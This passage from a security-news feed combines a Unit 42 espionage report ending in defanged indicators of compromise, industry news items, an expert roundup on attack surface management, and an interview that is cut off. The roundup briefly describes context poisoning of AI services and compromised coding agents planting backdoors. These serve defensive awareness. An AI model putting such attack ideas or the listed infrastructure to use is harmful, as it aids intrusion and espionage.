aircraft from a manufacturer based in Southeast Asia. We assess that the group compromised multiple Malaysian government departments and ministries. Using this access, the group sought to extract immigration and economic intelligence data. Additionally, we assess that the group compromised a large private financial entity in Malaysia that provides microloans in support of low-income households and small businesses. The group compromised a Mongolian law enforcement entity on Sept. 15, 2025. Shortly after, Mongolia’s Minister of Justice and Internal Affairs met with a counterpart from an Asian nation. Following the meeting, both countries signaled an intent to expand cooperation to combat transnational crime. Given the timing, we assess that this activity was likely associated with intelligence gathering in support of the initial meeting and ongoing cooperation discussions. In early 2025, the group compromised a major supplier in Taiwan's power equipment industry. With this access, we believe the group was able to access business files and directories pertaining to power generation projects across Taiwan. We further assess that in mid-December 2025, the group regained access to this network. We assess that on Nov. 5, 2025, the group compromised a Thai government department where it likely sought economic and international trade intelligence. The timing of this activity overlaps with the government’s effort to expand diplomatic relations with neighboring nations. As such, we assess the activity was likely intelligence gathering in support of the visit and future cooperation discussions. It is our observation that when it comes to African nations, the group's focus remains split between military interests and the advancement of economic interests, specifically mining efforts. We assess that the group likely compromised government and critical infrastructure entities in countries across the Democratic Republic of the Congo, Djibouti, Ethiopia, Namibia, Niger, Nigeria and Zambia, as shown in Figure 9: We assess that in December 2025, the group compromised a government ministry in this country. We found that earlier in the year, an Asian mining firm was responsible for an acid spill that caused significant impacts to a river in neighboring Zambia. In November 2025, a second spill by another Asian company impacted the waterways around Lubumbashi, the second-largest city in the DRC. This event prompted authorities to suspend mining operations for a subsidiary of the Zhejiang Huayou Cobalt Co. Given the timing and the group's unique focus on mining operations, we assess that activity could be related to this mining situation. Several nations maintain military bases in Djibouti. These bases enable combating piracy on the high seas as well as other regional logistics and defense functions across the Arabian Sea, Persian Gulf and Indian Ocean. In mid-November, a new Naval Escort Group from one of the nations assumed responsibilities in the region. During its operational debut, the group escorted a Panamanian-registered bulk carrier called the Nasco Gem that carries cargo such as coal and ore. In the context of cyber activity, this could be related to the targeting of mining sectors we observed from TGR-STA-1030. We assess that in late October 2025, the group gained access to a Djibouti government network. Given the timing of the activity, we believe it might be associated with intelligence collection in support of the naval handover operations. We assess that the group compromised a Zambian government network in 2025. This activity is likely associated with the Sino-Metals Leach Zambia situation. In February, a dam that held waste from an Asian mining operation collapsed and polluted a major river with cyanide and arsenic. The situation and associated clean-up efforts remain a political point of contention. TGR-STA-1030 remains an active threat to government and critical infrastructure worldwide. The group primarily targets government ministries and departments for espionage purposes. We assess that it prioritizes efforts against countries that have established or are exploring certain economic partnerships. Over the past year, this group has compromised government and critical infrastructure organizations across 37 countries. Given the scale of compromise and the significance of the impacted government entities, we are working with industry peers and government partners to raise awareness of the threat and disrupt this activity. We encourage network defenders and security researchers to leverage the indicators of compromise (IoCs) provided below to investigate and deploy defenses against this group. Palo Alto Networks customers are better protected from the threats discussed above through the following products and services: Advanced URL Filtering and Advanced DNS Security identify known URLs and domains associated with this activity as malicious. The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the indicators shared in this research. Advanced Threat Prevention is designed to defend networks against both commodity threats and targeted threats. Cortex XDR and XSIAM help to protect against the threats described in this blog, by employing the Malware Prevention Engine. This approach combines several layers of protection, including Advanced WildFire, Behavioral Threat Protection and the Local Analysis module, designed to prevent both known and unknown malware from causing harm to endpoints. If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42) UK: +44.20.3743.3660 Europe and Middle East: +31.20.299.3130 Asia: +65.6983.8730 Japan: +81.50.1790.0200 Australia: +61.2.4062.7950 India: 000 800 050 45107 South Korea: +82.080.467.8774 Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance. 138.197.44[.]208 142.91.105[.]172 146.190.152[.]219 157.230.34[.]45 157.245.194[.]54 159.65.156[.]200 159.203.164[.]101 178.128.60[.]22 178.128.109[.]37 188.127.251[.]171 188.166.210[.]146 208.85.21[.]30 abwxjp5[.]me brackusi0n[.]live dog3rj[.]tech emezonhe[.]me gouvn[.]me msonline[.]help pickupweb[.]me pr0fu5a[.]me q74vn[.]live servgate[.]me zamstats[.]me zrheblirsy[.]me 66ec547b97072828534d43022d766e06c17fc1cafe47fbd9d1ffc22e2d52a9c0 23ee251df3f9c46661b33061035e9f6291894ebe070497ff9365d6ef2966f7fe 5175b1720fe3bc568f7857b72b960260ad3982f41366ce3372c04424396df6fe 358ca77ccc4a979ed3337aad3a8ff7228da8246eebc69e64189f930b325daf6a 293821e049387d48397454d39233a5a67d0ae06d59b7e5474e8ae557b0fc5b06 c876e6c074333d700adf6b4397d9303860de17b01baa27c0fa5135e2692d3d6f b2a6c8382ec37ef15637578c6695cb35138ceab42ce4629b025fa4f04015eaf2 5ddeff4028ec407ffdaa6c503dd4f82fa294799d284b986e1f4181f49d18c9f3 182a427cc9ec22ed22438126a48f1a6cd84bf90fddb6517973bcb0bac58c4231 7808b1e01ea790548b472026ac783c73a033bb90bbe548bf3006abfbcb48c52d 9ed487498235f289a960a5cc794fa0ad0f9ef5c074860fea650e88c525da0ab4 Updated Feb. 5, 2026, at 7:40 a.m. PT to add Cortex product protections language.
unit42.paloaltonetworks.comFeb 5, 2026extracted
Quantum computing firm IonQ acquires US semiconductor firm SkyWater for $1.8 billion
Quantum computing firm IonQ acquires US semiconductor firm SkyWater for $1.8 billion IonQ and SkyWater Technology have entered into a definitive agreement pursuant to which IonQ will acquire SkyWater for $35.00 per share in a cash-and-stock transaction, subject to a collar, implying a total equity value of approximately $1.8 billion. “This transformational acquisition enables IonQ to materially accelerate its quantum computing roadmap and secure its fully scalable supply chain domestically. With secure, U.S.-based design, packaging and chip fabrication – IonQ will benefit from vertical integration across our increasingly interlinked quantum computing, quantum networking, quantum security, and quantum sensing applications for land, sea, air, and space,” said Niccolo de Masi, IonQ Chairman and Chief Executive Officer. Mr. de Masi continued, “We are confident that uniting our revolutionary quantum platform with SkyWater’s leading capabilities in parallel innovation, engineering, and manufacturing, will accelerate America’s ability to deploy quantum technology for mission critical applications. This historic transaction will significantly accelerate commercialization of our fully fault-tolerant quantum computers and benefit our nation’s broader quantum industry, enhancing our national security, economic strength, and technological superiority,” added de Masi “SkyWater is an unrivaled technology innovation partner, and with IonQ’s existing quantum sensing and quantum networking capabilities it will become the preeminent quantum merchant supplier under the continued leadership of Thomas Sonderman. Together, we remain committed to redefining what is possible for business, government, and society in the quantum era while unlocking long‑term value for shareholders of both companies,” concluded de Masi. “This combination marks a pivotal moment in SkyWater’s evolution,” said Thomas Sonderman, CEO of SkyWater Technology. “As the largest pure-play semiconductor foundry based in the U.S., SkyWater is already the partner of choice for advanced development and manufacturing services in both the public and private sectors as quantum computing and manufacturing increasingly align. “Joining forces with IonQ will accelerate multiple engineering pathways for next-generation quantum chips, delivering speed, precision, and scale. Importantly, SkyWater remains fully committed to all of our semiconductor foundry customers and will continue as the quantum merchant supplier of choice with an even broader set of quantum sensing and quantum networking solutions for all of our customers and partners,” added Sonderman. The combination of IonQ and SkyWater will create vertically integrated quantum platform company. In addition to strengthening IonQ’s position as a trusted ecosystem partner and merchant supplier in aerospace and defense, the combined company will be positioned to continue delivering innovative breakthroughs for customers across industries, including pharmaceuticals, finance, and cloud and enterprise computing, among others. IonQ’s proprietary technology and architecture, combined with SkyWater’s onshore R&D and manufacturing capabilities and differentiated development services, will create a full quantum ecosystem. Following the close of the transaction, SkyWater will operate as a wholly owned subsidiary under the SkyWater name serving a full range of customers. Mr. Sonderman will lead the subsidiary and report to Mr. de Masi, which will ensure the continued delivery of industry-leading Advanced Technology Services, Wafer Services, and Advanced Packaging Services as well as atomic clocks and quantum interconnects to all SkyWater customers.
helpnetsecurity.comJan 26, 2026extracted
Happy 9th Anniversary, CTA: A Celebration of Collaboration in Cyber Defense
At certain moments in a career, you get the rare opportunity to look back and say, this work mattered. Not because of an individual accomplishment, but because it contributed to something larger — something that changed how an industry thinks and operates. The Cyber Threat Alliance (CTA) is one of those efforts. When the CTA was first conceived in 2014, the cybersecurity industry looked very different than how it does today. Threat intelligence was widely viewed as a competitive advantage, tightly guarded and rarely shared beyond company walls. Collaboration between major security vendors — especially direct competitors — was almost unheard of. The prevailing mindset was simple: information was power, and power was proprietary. Against that backdrop, a bold idea emerged: What if competitors worked together for the collective defense of customers and the broader digital ecosystem? What if sharing high-fidelity threat intelligence could raise the cost for adversaries and make everyone safer? As Mark McLaughlin, then CEO of Palo Alto Networks, famously put it at the time, the importance of the future CTA was clear: “Don’t let this fail.” With that charge, four industry leaders — Palo Alto Networks, Fortinet, McAfee (Intel Security) and Symantec — came together on a handshake agreement to prove that collaboration at scale was not only possible, but necessary. It was, by any measure, a radical idea. Yet those early conversations laid the foundation for what would become the Cyber Threat Alliance. Turning that vision into reality required more than shared intent. A small working group representing each founding company was tasked with answering hard questions: what the CTA should be, what it should not be and how it could operate independently while earning trust across the industry. With guidance from experts familiar with the ISAC and ISAO landscape, the group worked through governance models, legal frameworks and operational structures. This involved reading more bylaws and legal documents than anyone ever hoped to encounter, but it was essential work. The CTA needed to be built deliberately, with integrity and clarity of purpose. As the organization took shape, strong leadership became critical. That need was met when Michael Daniel, fresh from serving as Cybersecurity Coordinator for President Obama, stepped in to lead the CTA. His experience, credibility and ability to navigate both policy and industry realities helped propel the organization forward during its formative years. Fast forward to 2026. As the CTA marks its ninth anniversary, the mission that sparked its creation remains relevant and urgent. The CTA has grown its influence beyond data sharing. The CTA stands in a unique position to provide oversight and technical influence as a global leader in cybersecurity policy by representing the member companies in one place. With the expanding membership that spans across the globe, the CTA is now an essential piece of global cybersecurity infrastructure. Adversaries continue to evolve, borders remain irrelevant to cyber threats and no single organization can defend alone. What has changed is our proof point: collaboration works. For those of us who have had the privilege of being involved since the earliest days, it has been remarkable to watch a bold idea turn into a trusted global institution. What began as a handful of competitors agreeing to try something different has grown into an organization that meaningfully influences how the industry shares intelligence, engages on policy and works together to protect customers worldwide. Being part of that journey — helping shape the foundation, watching it mature and continuing to support its growth — has been one of the most professionally rewarding experiences of my career. The CTA’s success is not defined solely by years or membership numbers, but by the collective commitment of its members to act in the interest of the broader ecosystem. Every shared indicator, every technical contribution and every policy engagement strengthens not just individual companies, but the security of communities across the globe. As we look ahead, the call to action is simple: stay engaged, stay committed and continue to collaborate. Whether through sharing intelligence, contributing technical expertise or helping shape global cybersecurity policy, each member plays a role in ensuring the CTA remains a trusted and effective force against today’s most pressing cyber threats. The work is far from done. Together, we are better positioned than ever to meet what comes next. Happy 9th Anniversary, CTA! Sharing Threat Intelligence Makes Everyone Safer – Michael Sikorski, Palo Alto Networks More About The Author Kathi Whitbey is the Lead Principal Program Manager for Unit 42 at Palo Alto Networks, where she has spent more than a decade driving strategic programs and initiatives. She played a pivotal role in the formation and incorporation of the Cyber Threat Alliance (CTA), including leading early efforts to design and operationalize the CTA Platform for secure intelligence sharing among member companies.Deeply committed to the mission of Unit 42, Kathi is a strong advocate for the team’s work and a dedicated mentor to emerging professionals in cybersecurity and risk management. Her career includes leadership roles in software development management and technical training across multiple U.S. government organizations, including the Department of State, where she traveled globally to deliver training on custom software applications. In addition to her professional work, Kathi has served as a volunteer Emergency Medical Technician, including a 12-month deployment supporting the U.S. Navy at Camp Lemonnier in Djibouti, Africa. She holds a Master’s degree in Information Systems and brings together technical expertise, operational leadership and a deep commitment to service and collaboration.
unit42.paloaltonetworks.comJan 24, 2026extracted
Former CISA Director Jen Easterly Appointed CEO of RSAC
Former CISA director Jen Easterly has been named the chief executive officer of the RSA Conference (RSAC). As CEO of RSAC, Easterly will oversee not only the flagship conference but also the company’s Innovation Sandbox, professional membership platform, education initiatives, and other programs. During her time at CISA, Easterly invested heavily in promoting Secure by Design principles, collaborating with the private sector to combat ransomware, creating the Known Exploited Vulnerabilities (KEV) catalog, and safeguarding critical infrastructure. Easterly and other appointees of the Biden administration left CISA just before the Trump administration took office. Prior to the cybersecurity agency, Easterly held leadership roles at the NSA, the White House, and Morgan Stanley. Easterly’s tenure at CISA, combined with her high-profile advocacy and startup advisory roles, has solidified her standing as an influential figure in the cybersecurity space. “RSAC is not just a conference—it’s the home of the global cybersecurity community,” said Easterly. “We’re at a pivotal moment where cybersecurity and AI have become inseparable, and the world needs a trusted platform to bring together the people, ideas, and technologies that will shape the next decade.” She added, “I’m honored to lead RSAC into its next chapter—expanding our international reach, strengthening our innovation ecosystem, and working with partners around the world to help build a future where technology is truly secure by design.” RSAC 2026 is set to take place in San Francisco on March 23-26 and is expected to attract more than 40,000 people from around the world. Related: Tim Kosiba Named NSA Deputy Director Related: Casie Antalis Appointed to Lead CISA Program Related: Madhu Gottumukkala Officially Announced as CISA Deputy Director Related: Aanchal Gupta Joins Adobe as Chief Security Officer
securityweek.comJan 16, 2026extracted
Cyber Insights 2026: External Attack Surface Management
Shadows are dark and dangerous places where bad guys attack anything or anyone they find. In 2026, AI will increase the number and size of shadows, together with the entire external attack surface. External Attack Surface Management (EASM) is the process of finding and managing every asset an organization exposes to the internet. Those assets may be known (and therefore documented and may be secured) or unknown (and therefore invisible and almost certainly insecure). While EASM covers both categories, we are primarily concerned with the invisible assets. “This includes domains, servers, APIs, and cloud assets that may not be tracked internally,” says Chris Boehm, field CTO at Zero Networks. “It matters because most companies do not have a complete inventory of what is visible from the outside, and attackers often find these gaps before defenders do.” EASM provides the inventory. “The benefit lies in exposure governance: accepting that not all risk can be removed, but through visibility, measurement and monitoring, there is scope to prioritize and treat risk in a way that supports business alignment and accountability,” explains Dave McGrail, head of business consultancy at Xalient. The invisible external assets are the easiest avenue for attackers to discover and exploit. “By continuously finding and prioritizing internet-facing services, misconfigurations, expired certificates, dormant assets and third-party exposures, EASM reduces the blind spots that lead to breaches,” adds Kevin Curran, IEEE senior member and professor of cybersecurity at Ulster University. The issue is the basic asymmetry of cybersecurity: cybercriminals need only find one weakness while defenders must be perfect all the time, everywhere. “EASM seeks to be the proverbial finger in the dyke of the organization, continually trying to examine the company defenses and be aware when a system becomes vulnerable to attack; so a mitigation can be applied before the attacker takes advantage of the weakness,” says Dave Tyson, chief intelligence officer at iCOUNTER. “EASM is simply the habit of knowing what the internet says you’re running, catching the weak [invisible] entry points and closing them before someone else walks in,” says Yaz Bekkar, principal consulting architect XDR at Barracuda Networks. “It’s a case of locking the front door before you guard the vault.” Continuous expansion the external attack surface The size of the hidden external attack surface is constantly expanding. The reason can be found in the combined nature of modern business and modern technology. Technology changes rapidly, and business seeks to take advantage rapidly – at least, ahead of its competitors to maintain, improve, or gain a competitive edge. The result is that new technology is deployed faster than security can react, and these days, often without security’s knowledge. “The attack surface keeps expanding as cloud and remote work make it easy for teams to deploy new services without central oversight. Developers sometimes create their own environments to test or deploy applications, and these can sit outside security’s visibility,” says Boehm. “The surface grows because organizations add cloud services, APIs, SaaS apps, IoT devices, developer environments, CI / CD pipelines and third-party integrations faster than they can inventory and secure them,” adds Curran. “Shadow resources (temporary dev / test instances, forgotten domains, contractor access) and the shift to edge and hybrid cloud mean it will keep expanding – especially across multi-cloud endpoints, API ecosystems and partner / TTP integrations.” But “the single greatest driver to the expanding attack surface of any organization is, ironically, not in their control – it is in the control of their third parties and supply chain partners who have shared two way data connections between them,” warns Tyson. These trusted pathways have changed the algorithm of risk each defender faces. “Imagine,” he explains, “an organization, connected to 300 companies. Each one of those companies is being scanned, probed, and attacked every day, with the sole goal of finding a connection to your company – through the trusted connection in place, thereby avoiding significant scrutiny.” Today, he continues, “This is possible because the cyber attacker has embraced the AI advantage of enumerating a target company’s trusted connections and conducting reconnaissance on them in near real time, every day. The adversary AI can find the exact list of companies to attack each day, and they can know exactly which attack methods are mostly likely to succeed.” Two other areas are worthy of note: acquisitions, and our rapid adoption and deployment of AI. “Acquisitions are notoriously hard to secure. As soon as it’s announced, you’re a target, and companies rarely have the discipline to consolidate duplicate systems quickly. They’re looking to demonstrate financial synergies from the acquisition first,” comments Aimee Cardwell, CISO in residence at Transcend. She also adds, “It will surprise no one that in 2026, the attack surface will grow mainly around AI. Companies are trying to adopt AI tools without understanding where their data goes or how models are being trained. Each new AI app becomes another entry point, and worse, most organizations have zero visibility into how many employees are uploading data to ChatGPT or similar consumer tools.” Raj Mallempati, CEO and co-founder at BlueFlag Security, expands on this. “The attack surface is exploding enterprise wide as every department adopts AI agents. Marketing uses AI for content generation, sales for lead qualification, operations for process automation.” Alex Polyakov, co-founder and CTO at Adversa AI, agrees. “Yes, the attack surface is exploding – and AI agents are the reason. They’ll live everywhere: on workstations, in agentic browsers, in SaaS apps, and eventually as enterprise-wide autonomous agentic AI systems. In this world, the concept of a perimeter disappears entirely.” Pascal Geenens, VP of cyber threat Intelligence at Radware, continues, “Next year, enterprises will face a new kind of visibility crisis as AI agents start forming their own network of connections. These autonomous integrations will create an agentic ecosystem, a hidden layer of APIs, plug-ins, and context providers operating beyond traditional controls… The agentic services ecosystem is a rapidly expanding constellation of third-party modules, plug-ins, and AI service connectors. It will mirror the software supply chain crisis that emerged with open-source dependency attacks.” But the critical expansion – and highest risk, says Mallempati, “is in the SDLC, where AI agents aren’t just processing information but actively creating and deploying code. By 2026, we predict autonomous agents will touch 60-70% of enterprise code. Unlike a compromised chatbot that might leak customer data, a compromised development AI agent can inject backdoors into your entire product, modify infrastructure, or expose your complete IP. The development environment is where AI agents have the most privileged access and the least governance.” While the AI expansion of the external threat surface will be extensive, not everyone thinks it is necessarily uncontrollable. “If the risk is managed appropriately with mature processes and controls – including through identity management, just-in-time access and automated anomaly detection – there’s no reason to conflate a larger attack surface with increased risk,” says McGrail. The shadowy surface Shadows are a part of business. Employees will rapidly use new services without corporate oversight or knowledge if they feel it makes their work more efficient. The term most usually refers to the activities of individuals but can also involve the practice of internal teams or the company itself. “Shadows are a major problem because they bypass governance, logging and patching,” points out Curran. “All shadow platforms are a risk because of their unknown, unmaintained internet exposure,” adds Bekkar. The latest addition to the menagerie is shadow AI. “Shadow AI exists across the enterprise, but shadow AI in development is uniquely dangerous. While shadow AI in marketing might generate unapproved content, shadow AI in development can access production systems, leak source code, or introduce vulnerabilities that affect millions of users,” warns Mallempati. “Shadow AI is a bigger risk than shadow IT ever was because it involves sending sensitive data to opaque external APIs with no controls. Someone exports user data to Excel, then uploads it to ChatGPT for analysis. Suddenly you have regulated data in a third-party system, and when a breach happens, you can’t determine scope because you never knew the data was there,” warns Cardwell. “Shadow AI will likely become a larger issue given the proliferation of AI platforms and the time it will take organizations to get effective AI governance in place. Since pretty much all AI systems leak data, whatever employees load into them is at risk,” adds Tyson. “Those risks are blind spots of potential security vulnerabilities – they can lead to data breaches through improper handling of sensitive information by unapproved AI models, potentially exposing intellectual property or confidential data,” warns Melissa Ruzzi, director of AI at AppOmni. “Furthermore, unauthorized AI usage where company information was shared can be exploited to craft sophisticated phishing attacks and even generate disinformation campaigns,” she continues. “Ultimately, this causes a skewed view of risk, putting compliance and business resilience in jeopardy,” adds McGrail. MCP Risks Shadow Model Context Protocol (MCP) servers in development environments are particularly insidious. “Developers are spinning up unauthorized MCP servers that connect their IDEs directly to AI models, granting these connections access to entire codebases, credentials, and infrastructure. We’re seeing developers grant AI agents broad permissions ‘temporarily’ for debugging that never get revoked,” says Mallempati. “Shadow MCPs are a serious problem. Unmonitored or unauthorized MCP servers often emerge as developers experiment with AI agents – they create blind spots where autonomous systems can write, modify and deploy code without security oversight,” warns Shahar Man, co-founder and CEO at Backslash Security. “MCP can bring even more complex challenges, exposing sensitive data, causing unauthorized automation, and escalating privileges without oversight,” adds Natalie Walker, VP at NCC Group. Shining a light into the shadows Managing shadows requires two things, suggests Cardwell. “First, automated discovery – manual surveys don’t work because people either don’t realize what they’re doing is risky, or they’re not incentivized to tell you. You need tools that scan network traffic and API calls to catch unseen AI usage.” Second, she continues, “Provide better alternatives. When I find shadow AI, I start by asking what gap the users were trying to fill. Then either give them an approved tool that does the same thing, or work with them to bring their system into compliance. Banning tools without offering alternatives just drives behavior further underground. Folks are trying to do the right thing – how can we enable them to do that safely?” McGrail adds, “There’s a fine balance between the shadow risk and the risk of not allowing a level of business agility.” Attacks against the external attack surface In 2026, “Attackers will leverage context poisoning by embedding malicious behavioral patterns or manipulative datasets into AI service configurations that persist across deployments. This will trigger AI-native supply chain breaches, where enterprises unknowingly integrate compromised agentic services that manipulate autonomous decision chains, exfiltrate sensitive information, or subtly bias business logic,” warns Geenens. Organizations have moved critical business processes to SaaS applications in search of agility, scalability and efficiency. In many cases, appropriate security controls have not followed. “Attackers understand this and are increasingly taking advantage of the opportunity by breaching organizational SaaS tenants. They’ll continue exploiting this shift using techniques such as phishing, credential stuffing / spraying, session hijacking, and token theft to gain unauthorized access to identity providers and SaaS environments,” says Brian Soby, CTO and co-founder at AppOmni. He adds, “The widespread use of SaaS also introduces risks from misconfigurations and overly permissive access, which attackers will continue to exploit for lateral movement and data theft.” 2026 will also mark the moment when zero click attacks transcend the human layer altogether. “We’ll see the rise of AI-to-AI attacks, in which malicious autonomous agents target legitimate corporate AI systems, exploiting APIs, model context protocols and SDK integrations,” says Rob Juncker, CPO at Mimecast. “The result is an attack surface that multiplies exponentially, often without a single alert or human noticing.” Shahar Man adds, “Next year, we’ll see the first large-scale breach originating from an MCP. A backdoor or supply chain poisoning attack will quietly embed malicious code into enterprise environments, spreading through AI-driven development workflows before anyone detects it. When this breach comes to light, it will expose how deeply enterprises have trusted these agents without sufficient oversight.” IPv6 is another area likely to be attacked in 2026 – adoption is advancing faster than the visibility tooling required to secure it. Conner Lines, CTO at SixMap, warns, “In 2026 some of the most severe breaches will originate from assets that exist only in the IPv6 dimension of enterprise infrastructure – services brought online for modernization, compliance, or cost reasons, but never fully integrated into external attack-surface management.” He adds, “Any visibility stack that fails to treat IPv6 as a first-class external exposure domain will be operating blind where attackers already have line of sight.” The OSS supply chain should also be considered part of the external attack surface since the initial attack is against repositories outside of security’s purview. “Adversaries are already playing the long game, contributing legitimate code to open-source software projects, building trust within developer communities and waiting for the right moment to strike,” warns Keith McCammon, co-founder and Chief Security Officer at Red Canary (acquired by Zscaler). “The goal won’t be a single breach, but systemic leverage. One compromise in a widely used dependency could ripple across thousands of organizations overnight.” Instead of spraying exploits across thousands of targets, adversaries will compromise a single trusted dependency to reach many. With most open-source projects maintained by small teams or individual developers, often without security oversight, the attack surface has never been more exposed – or more tempting. He adds that trust becomes the most exploited vulnerability in 2026. “Organizations must verify not just who accesses their systems, but what code they run. Knowing the origin, integrity, and build process of every component will become a baseline requirement, because in 2026, trust becomes the exploited vulnerability.” Martin Reynolds, field CTO at Harness, agrees with this assessment. “Many enterprises will say they have learnt supply chain security lessons after 2023’s SolarWinds breach – but that doesn’t mean their AI has. With AI expanding software supply chain volume and complexity, similar incidents become more likely and severe, as a single compromised component could cascade across thousands of enterprises.” In 2026, he adds, “scalable supply chain security will become non-negotiable. Software composition analysis must scan every dependency, SBOMs must be maintained in real time, and remediation needs to be automated.” Managing the external attack surface The overarching belief is that AI will play a pivotal role in securing the external attack surface in the future – whether that is machine learning today or agentic AI tomorrow. “AI already adds value by processing large amounts of discovery data and highlighting the assets most likely to pose risk. It helps teams focus faster, not by acting on its own, but by turning thousands of potential issues into a few clear priorities,” says Zero Networks’ Boehm. “Full automation, where AI systems can verify ownership and shut down risky exposures, is still a few years away.” John Bruggeman, a virtual CISO with CBTS, agrees with the use of AI. “AI, in the form of machine learning, can help detect new external assets – like shadow IT – by constantly scanning your network for new servers – like remote desktop servers – or new SaaS applications with your domain name. There are services that do that now, but there are often false positives – detected assets that the service thinks are yours, but are not. ML can help weed out the false positives and make external discovery of new assets more accurate, so that less manual review is required.” He also suggests other possible approaches. “One way to detect shadow IT existing in your environment is to monitor corporate email. If departments are using shadow IT, odds are they are using their corporate email account. Another way is to monitor network traffic at the firewall. AI can be used to sift through your network traffic and find SaaS applications that IT doesn’t know about. Once you know how big the problem is, you can start to manage it.” Tim Chang, VP of application security product management, cybersecurity and digital identity at Thales, warns, “The attack surface isn’t simply ‘growing’, it’s fragmenting into thousands of dynamic entry points. In this landscape, protecting APIs and applications moves from best practice to existential necessity. Through 2026, bot defense will shift from passive detection to active disruption to spot intent, fingerprint behavior, and intercept malicious automation before it ever reaches the application layer.” He continues, “Organizations will invest heavily in runtime bot analytics, anomaly detection, and AI-against-AI countermeasures as bot-driven fraud, credential abuse, and API exploitation surge. APIs, the convergence point for humans, machines, agents, and devices, will finally receive the scrutiny they’ve long deserved.” And concludes: “Companies that elevate API security and harden web applications against AI-powered bots will reduce outages, protect sensitive data, and safeguard customer trust and experience. Those that don’t will find themselves facing an adversary that never sleeps, never slows, and learns from every single attempt.” NCC Group’s Walker sees the rise of agentic AI coming to EASM. “Unlike traditional AI that primarily responds to commands, agentic AI is composed of autonomous agents that can make their own decisions.” There is an enterprise-wide uptake in agentic AI. It will introduce more automation and require less human intervention. “Emerging autonomous EASM ecosystems will orchestrate discovery, prioritization and patching, complemented by continuous red-teaming and attack simulation,” she says. “But the vast majority of settings will still require human oversight and insight before any real-time remediation.” Professor Curran supports the use of ML / AI. “It can speed asset discovery, reduce false positives, correlate signals (DNS, certs, telemetry) and predict which exposures are most likely to be exploited. Behavioral models help detect anomalous changes to public-facing assets. AI also helps automate prioritization and generates contextual remediation playbooks, though human validation remains essential where risk decisions are sensitive.” Barracuda Networks’ Bekkar continues the AI theme. “Defenders need to use AI as the engine of EASM, not as a sidekick. Let it continuously discover internet-facing assets, decide if they belong to the organization, and use pattern-matching to spot look-alike domains. Organizations can leverage AI to remove noise by grouping duplicates and obvious false positives, then ranking what’s left by risk level: how easily the exposed asset could lead to identity or data access.” He believes the routine stuff can be automated: “Expire test subdomains, close orphaned buckets, revoke stale tokens, but ensure there’s a human in the loop for anything sensitive.” Sheetal Mehta, head of cyber security at NTT Data, projects beyond ML / AI to the agentic AI. “With the introduction of AI and agentic AI, EASM could soon move to continuous monitoring – mapping and inferring connections between IP, supply chains, domains and cloud instances to find shadow IT that is ordinarily missed – or better still, learning patterns to detect unusual activity and act to quickly mitigate and help security teams better prioritize efforts.” Not everyone is fully sold on AI. “It can help with automated discovery and classification across your environment, but it’s not a silver bullet. It’s most useful for surfacing where sensitive data lives continuously rather than just during annual audits,” says Transcend’s Cardwell. “The good news is that there are really great tools being developed to reduce this risk. Can we buy and implement those tools as quickly as the threat actors can use AI to find new chinks in our armor? I’m ‘glass half empty’ on that. But I do think this is a place for CISOs to invest in 2026.” It is important to remember that what is sauce for the defending goose is also sauce for the attacking gander. If defenders can use AI to locate their exposures, so too can, and will, attackers do the same. It will be a race, but the primary advantage for the defender is greater situational context. Attackers and defenders will both find the exposures, but defenders will better understand the critical exposures to prioritize. iCOUNTER’s Tyson has an additional recommendation designed to counter third party risk. He suggests widening viewpoints to include the entire enterprise ecosystem, and monitoring every critical organization for active compromise. “This way,” he says, “organizations can understand the risk uniquely related to them from the entirety of their connected partners.” If you wish to monitor the external attack surface, you need to include your connected partners, he adds. “In today’s world, cybercriminals have simply expanded the attack surface to 3rd and 4th parties, and ecosystem compromise monitoring is the ultimate tool in redefining the new expanded attack surface.” Final thoughts “External attack surface management will remain a critical, but increasingly complex, issue in cyber security in the year ahead, largely because organizations have lost control of their environments,” warns Simon Phillips, CTO of Engineering at CybaVerse. Control has been lost because business pressure and the need for agility to stay ahead of the competition results in new technology being adopted faster than security can apply governance. This includes the rapid adoption of SaaS solutions, the personal use of shadow IT, and the unsanctioned rise of shadow AI by individuals and developers downloading undisclosed copies of MCP. AI is the double-edged sword in the picture. It will assist companies in finding their external attack surface, but it will also assist bad actors in locating and attacking the weak points. The likelihood for 2026 is that the battle between attackers and defenders will increase in size, complexity and speed – with no sign of any decrease. Related: The Wild West of Agentic AI – An Attack Surface CISOs Can’t Afford to Ignore Related: CSA Unveils SaaS Security Controls Framework to Ease Complexity Related: The Shadow AI Surge: Study Finds 50% of Workers Use Unapproved AI Tools
securityweek.comJan 13, 2026extracted
Rising Tides: When Cybersecurity Becomes Personal – Inside the Work of an OSINT Investigator
“All of us matter, or none of us do,” a strong statement from Shannon Miller, OSINT Investigator and Privacy Consultant. For those of us who know Miller, it’s not the first time we’ve heard that plea and it won’t be the last. Her significant career and non-profit work to help victims of domestic danger and other similar malice find safety, she’s seen first-hand how the dangers are amplified for marginalized and vulnerable groups who do not have as much access to tools, education, and other critical resources to protect themselves and their families. Miller’s work goes beyond individuals and families, however. Consider the Fortune 500 or startup executive who might have a disgruntled former employee, or has caught the attention of a cybercriminal, or another type of stalker, who needs to protect themselves, their companies, and their families. The upside of all the technology and access we have is also what creates so much risk in the multitude of dangerous situations that Miller has seen and helped people out of in the most efficient and least disruptive ways possible. But, we as a cyber community have to help, but building ethics and integrity into our products so they can be used less maliciously in human cases; not simply data cases. Anything created can be used for good or it can be abused. Our community has an obligation to ensure tech is created with ethics, integrity and guardrails in place to minimize the harm. Read on to learn more about Miller’s critical and impressive work, how she takes it beyond her career and does fundraising for those who need help and can’t afford it, and where the line between her cases with stalkerware and cybersecurity abuse bridge her natural talent as an OSINT investigator. She also talks about maintaining balance in a rapid-paced and also emotionally straining career. Oh, and if she wasn’t working in cyber she’d specialize in equine therapy for people with post-traumatic stress disorder (PTSD) and complex-PTSD (C-PTSD). That tracks. Q. You have an extremely dynamic profile online. If you were to sum up all of you into a quick description, what would you say? A. Tiny terrifying blonde with all the data. That’s the description a friend gave me, I ran with it. Q. You’re very vocal about your work in privacy consulting and digital safety training, and you cover a significant amount of use cases. Which areas of privacy and safety satisfy you most? A. I find cases of stalkerware and cyberstalking some of the most interesting, because there’s so many different ways I’ve seen it occur. The patterns are similar, but purpose or reasons for doing so vary, depending on the individual, nation state, or case. Q. Can you provide an example of a situation where your work was pivotal in someone’s safety – only if you can do 